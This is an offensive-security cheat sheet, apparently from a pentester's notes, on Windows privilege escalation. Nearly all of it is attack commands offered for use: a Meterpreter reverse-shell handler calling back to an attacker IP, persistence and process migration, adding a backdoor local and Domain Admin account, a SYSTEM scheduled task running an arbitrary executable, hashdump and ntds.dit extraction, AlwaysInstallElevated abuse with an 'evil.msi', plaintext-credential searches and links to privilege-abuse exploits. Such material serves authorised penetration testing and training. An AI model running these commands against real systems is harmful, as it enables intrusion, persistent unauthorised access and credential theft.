
Windows Privilege Escalation
S1REN
Going up.
TL;DR
+-------------------------------+
| INITIAL ENUMERATION |
+-------------------------------+
DOMAIN ENUM (if joined)
BloodHound / SharpHound
WHOAMI?
whoami
echo %username%
PRIVILEGES?
whoami /priv
SYSTEM INFO
systeminfo
wmic os get Caption,CSDVersion,OSArchitecture,Version
SERVICES
wmic service get name,startname
net start
ADMIN CHECK
net localgroup administrators
net user
NETWORK
netstat -anoy
route print
arp -A
ipconfig /all
USERS
net users
net user
net localgroup
FIREWALL
netsh advfirewall firewall show rule name=all
SCHEDULED TASKS
schtasks /query /fo LIST /v > schtasks.txt
INSTALLATION RIGHTS
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+-----------------------------------------------------------------------+
| WINDOWS PRIV ESC: GITHUB EXPLOITS |
+-----------------------------------------------------------------------+
| Privilege Name | GitHub PoC |
|---------------------------- |-----------------------------------------|
| SeDebugPrivilege | github.com/bruno-1337/SeDebugPrivilege- |
| SeImpersonatePrivilege | github.com/itm4n/PrintSpoofer |
| SeAssignPrimaryToken | github.com/b4rdia/HackTricks |
| SeTcbPrivilege | github.com/hatRiot/token-priv |
| SeCreateTokenPrivilege | github.com/hatRiot/token-priv |
| SeLoadDriverPrivilege | github.com/k4sth4/SeLoadDriverPrivilege |
| SeTakeOwnershipPrivilege | github.com/hatRiot/token-priv |
| SeRestorePrivilege | github.com/xct/SeRestoreAbuse |
| SeBackupPrivilege | github.com/k4sth4/SeBackupPrivilege |
| SeIncreaseQuotaPrivilege | github.com/b4rdia/HackTricks |
| SeSystemEnvironment | github.com/b4rdia/HackTricks |
| SeMachineAccount | github.com/b4rdia/HackTricks |
| SeTrustedCredManAccess | learn.microsoft.com/...trusted-caller |
| SeRelabelPrivilege | github.com/decoder-it/RelabelAbuse |
| SeManageVolumePrivilege | github.com/CsEnox/SeManageVolumeExploit |
| SeCreateGlobalPrivilege | github.com/b4rdia/HackTricks |
+-----------------------------------------------------------------------+
Notes:
- PrintSpoofer is gold for SeImpersonatePrivilege.
- SeManageVolume has practical field PoCs.
+----------------------------+
| MAINTAINING ACCESS |
+----------------------------+
> METERPRETER REVERSE SHELL SETUP
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <port>
exploit
> PERSISTENCE
meterpreter > run persistence -U -i 5 -p 443 -r <LHOST>
> PORT FORWARDING
meterpreter > portfwd add -l 3306 -p 3306 -r <target_ip>
> SYSTEM MIGRATION
meterpreter > run post/windows/manage/migrate
meterpreter > migrate <PID>
> EXECUTE PAYLOADS
powershell.exe "C:\Tools\privesc.ps1"
+-------------------------------+
| PRIVES EC CHECKLIST |
+-------------------------------+
> UNQUOTED SERVICE PATHS
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /v "C:\Windows" | findstr /v '"'
> WEAK SERVICE PERMISSIONS
accesschk.exe -uwcqv <service>
sc qc <service>
icacls "C:\Path\To\Service.exe"
> FILE TRANSFER OPTIONS
certutil.exe
powershell (IEX)
SMB / FTP / TFTP / VBScript
> CLEAR TEXT CREDENTIALS
findstr /si password *.txt *.xml *.ini
dir /s *pass* == *cred* == *.config*
> WEAK FILE PERMISSIONS
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
> NEW ADMIN USER (Local/Domain)
net user siren P@ssw0rd! /add
net localgroup administrators siren /add
net group "Domain Admins" siren /add /domain
+--------------------------------+
| SCHEDULED TASK ABUSE |
+--------------------------------+
> ENUM
schtasks /query /fo LIST /v > tasks.txt
> CREATE SYSTEM TASK
schtasks /create /ru SYSTEM /sc MINUTE /mo 5 /tn RUNME /tr "C:\Tools\sirenMaint.exe"
> RUN TASK
schtasks /run /tn "RUNME"
+-------------------------------+
| POST EXPLOIT ENUMERATION |
+-------------------------------+
> NETWORK USERS
net user
net user <target>
net localgroup administrators
> NT AUTHORITY CHECKS
whoami
accesschk.exe /accepteula
MS09-012.exe "whoami"
> HASH DUMP
meterpreter > hashdump
> EXFILTRATE ntds.dit
Use secretsdump.py or disk capture tools
> INSTALLER ABUSE
AlwaysInstallElevated = 1
msiexec /i evil.msi
> SHARE ENUMERATION
net share
net use
net use Z: \\TARGET\SHARE /persistent:yes
+----------------------------+
| TOOLKIT / RESOURCES |
+----------------------------+
> Windows Exploit Suggester
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
> Cross Compile Payloads (Linux > Windows)
apt-get install mingw-w64
x86: i686-w64-mingw32-gcc hello.c -o hello.exe
x64: x86_64-w64-mingw32-gcc hello.c -o hello64.exe
> Additional Reading
https://www.fuzzysecurity.com/tutorials/16.html
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation